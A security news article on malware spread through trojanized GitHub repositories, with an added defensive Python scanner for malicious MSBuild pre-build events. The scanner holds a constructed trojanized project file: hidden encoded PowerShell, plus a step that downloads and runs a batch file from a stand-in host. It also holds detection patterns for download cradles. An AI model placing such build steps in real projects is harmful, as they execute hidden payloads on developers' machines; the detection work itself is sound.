The Malware
Cybersecurity researchers have uncovered a new campaign in which threat actors published at least 67 GitHub repositories. The repositories claim to offer Python-based hacking tools but deliver trojanized payloads instead.
This activity, which ReversingLabs codenamed Banana Squad, appears to continue a rogue Python campaign first identified in 2023. At that time, the attackers targeted the Python Package Index (PyPI) with bogus packages that attracted over 75,000 downloads and stole information from Windows systems.
Moreover, the new findings expand on a previous report from SANS’s Internet Storm Center in November 2024. That report described a supposed “steam-account-checker” tool hosted on GitHub, which included stealthy features to download additional Python payloads. These payloads injected malicious code into the Exodus cryptocurrency wallet app and exfiltrated sensitive data to an external server (“dieserbenni[.]ru”).
Additionally, a deeper analysis of both the repository and the attacker-controlled infrastructure revealed 67 trojanized GitHub repositories. These repositories impersonate legitimate ones by using the same names, thereby deceiving unsuspecting users.
Evidence further indicates that this campaign targets users who search for tools like account cleaners and game cheats—including Discord account cleaner, Fortnite External Cheat, TikTok username checker, and PayPal bulk account checker. GitHub has since taken down all the identified repositories.
According to ReversingLabs researcher Robert Simmons, “Backdoors and trojanized code in publicly available source code repositories like GitHub are becoming more prevalent and represent a growing software supply chain attack vector.”
He also warned, “For developers relying on these open-source platforms, it’s essential to always double check that the repository you’re using actually contains what you expect.”
GitHub as a Malware Distribution Service
The development highlights how GitHub continues to be abused as a malware distribution vector across several campaigns. Earlier this week, Trend Micro uncovered 76 malicious GitHub repositories that a threat actor dubbed Water Curse used to deliver multi-stage malware.
These payloads aim to siphon credentials, browser data, and session tokens. Additionally, they enable the threat actors to maintain persistent remote access to the compromised systems.
Shortly after, Check Point exposed another campaign that leverages a criminal service known as the Stargazers Ghost Network to infect Minecraft users with Java-based malware. This network comprises several GitHub accounts that spread malware or malicious links through phishing repositories.
According to Check Point, “The network consists of multiple accounts that distribute malicious links and malware and perform other actions such as starring, forking, and subscribing to malicious repositories to make them appear legitimate.”
Moreover, Check Point assessed that these GitHub “Ghost” accounts represent only a portion of a much larger system. Other Ghost accounts operate on different platforms, contributing to an expansive Distribution-as-a-Service (DaaS) infrastructure.
Earlier, in April 2024, Checkmarx revealed more details about the Stargazers Ghost Network. The group demonstrated a clear pattern of using fake stars and frequent updates to artificially boost repository visibility and push them to the top of GitHub search results.
These malicious repositories masquerade as legitimate projects, typically built around popular games, game cheats, or tools such as cryptocurrency price trackers and multiplier predictors for crash-betting games.
In parallel, these campaigns overlap with another wave of attacks that targets inexperienced cybercriminals looking for easy-to-use malware or attack tools. The attackers trick them into downloading backdoored repositories that compromise their own systems with information stealers.
Sophos finds more
For instance, Sophos this month highlighted the trojanized Sakura-RAT repository. It contains hidden malicious code that infects anyone who compiles the project with information stealers and remote access trojans (RATs).
Sophos researchers also identified four types of backdoors across these repositories: those embedded in Visual Studio PreBuild events, Python scripts, screensaver files, and JavaScript. These components steal data, capture screenshots, communicate via Telegram, and download additional payloads such as AsyncRAT, Remcos RAT, and Lumma Stealer.
Altogether, the company detected at least 133 backdoored repositories. Of these, 111 carried the PreBuild backdoor, while the remaining ones hosted Python, screensaver, or JavaScript-based backdoors.
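The PreBuild variant, which accounted for 111 of the 133 repositories, is worth a concrete check: a Visual Studio pre-build event runs whatever command line is placed in the project file before the first line of the advertised "tool" is compiled, so opening the solution and hitting Build is enough to execute it. The scanner below is an added example written for this page; it is not code from the article, from Sophos, or from any of the repositories discussed. It parses MSBuild project files (.csproj, .vbproj, .vcxproj and friends) and flags PreBuildEvent/PostBuildEvent text and Exec tasks whose command lines carry typical staging markers (encoded PowerShell, hidden windows, download utilities, remote URLs, long base64 runs). The indicator patterns are this example's own heuristics, not published IOCs, and the two embedded sample projects are constructed; the encoded blob in the trojanized sample decodes to a harmless Write-Host line.

```python
import base64
import re
import sys
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Dict, List

PROJECT_SUFFIXES = {".csproj", ".vbproj", ".vcxproj", ".fsproj", ".targets", ".props"}
EVENT_TAGS = {"PreBuildEvent", "PostBuildEvent"}

# Heuristic markers for build steps that stage a second payload. These are this
# example's own assumptions, not indicators published by Sophos or anyone else.
SUSPICIOUS_PATTERNS = {
    "powershell_encoded": re.compile(r"powershell(\.exe)?[^\n]*\s-(e|en|enc|encodedcommand)\b", re.I),
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|bitsadmin|certutil", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden|start\s+/b|/min\b", re.I),
    "base64_blob": re.compile(r"[A-Za-z0-9+/]{80,}={0,2}"),
}


def _local(tag: str) -> str:
    """Strip the MSBuild XML namespace so classic and SDK-style projects look alike."""
    return tag.rsplit("}", 1)[-1]


def scan_project_xml(xml_text: str) -> List[Dict[str, object]]:
    """Return one finding per build-event element or Exec task that matches a pattern, in document order."""
    root = ET.fromstring(xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    findings: List[Dict[str, object]] = []

    def record(location: str, command: str) -> None:
        hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(command)]
        if hits:
            findings.append({"location": location, "indicators": hits, "command": command.strip()})

    for elem in root.iter():
        name = _local(elem.tag)
        if name in EVENT_TAGS:
            # Classic projects: the command line is the element text.
            record(name, elem.text or "")
        elif name == "Exec":
            # SDK-style projects: an Exec task inside a Target hooked to the build.
            target = elem
            while target is not None and _local(target.tag) != "Target":
                target = parents.get(target)
            target_name = target.get("Name", "?") if target is not None else "?"
            record(f"Exec in Target '{target_name}'", elem.get("Command", ""))
    return findings


def scan_tree(root_dir: str) -> List[Dict[str, object]]:
    """Walk a checked-out repository and scan every MSBuild project file in it."""
    results = []
    for path in Path(root_dir).rglob("*"):
        if path.suffix.lower() not in PROJECT_SUFFIXES or not path.is_file():
            continue
        try:
            for finding in scan_project_xml(path.read_text(encoding="utf-8-sig")):
                results.append({"file": str(path), **finding})
        except ET.ParseError as exc:
            # A project file that will not parse deserves a manual look rather than silence.
            results.append({"file": str(path), "location": "parse",
                            "indicators": ["unparseable_xml"], "command": str(exc)})
    return results


# Constructed samples for demonstration (not content of any real repository).
# The encoded blob is UTF-16LE base64 of a harmless "Write-Host" line, built here at runtime.
_ENCODED = base64.b64encode("Write-Host 'constructed example'".encode("utf-16-le")).decode()

BENIGN_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup><OutputType>Exe</OutputType><TargetFramework>net8.0</TargetFramework></PropertyGroup>
  <Target Name="Stamp" BeforeTargets="Build">
    <Exec Command="git rev-parse HEAD &gt; $(ProjectDir)version.txt" />
  </Target>
</Project>"""

TROJANIZED_CSPROJ = f"""<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <PreBuildEvent>powershell -w hidden -ep bypass -enc {_ENCODED}</PreBuildEvent>
  </PropertyGroup>
  <Target Name="Stage2" BeforeTargets="PreBuildEvent">
    <Exec Command="curl -s http://example.invalid/stage2.bat -o stage2.bat &amp;&amp; start /b stage2.bat" />
  </Target>
</Project>"""


if __name__ == "__main__":
    # Usage: python scan_prebuild.py <path-to-cloned-repo>; with no argument, scan the embedded sample.
    findings = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else scan_project_xml(TROJANIZED_CSPROJ)
    for f in findings:
        print(f.get("file", "<sample>"), f["location"], ", ".join(f["indicators"]), sep=" | ")
        print("    ", f["command"][:120])
```

Run it against a freshly cloned repository before opening the solution in Visual Studio; anything it reports should be read in full in a text editor, since the IDE's property page shows only the first line of a long pre-build event. The heuristics will also fire on some legitimate build scripts that download tooling, so treat a hit as a reason to read the command, not as a verdict.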
Furthermore, Sophos concluded that these campaigns are probably connected to a DaaS operation active since August 2022. This operation uses thousands of GitHub accounts to distribute malware through trojanized repositories focused on gaming cheats, exploits, and attack tools.
Although the precise distribution methods remain unclear, researchers believe the threat actors also use Discord servers and YouTube channels to promote links to the backdoored repositories.
Sophos added, “It remains unclear if this campaign is directly linked to some or all of the previous campaigns reported on, but the approach does seem to be popular and effective, and is likely to continue in one form or another.”
The company further warned that future campaigns may shift focus to user groups beyond inexperienced cybercriminals and gamers.
Source: TheHackerNews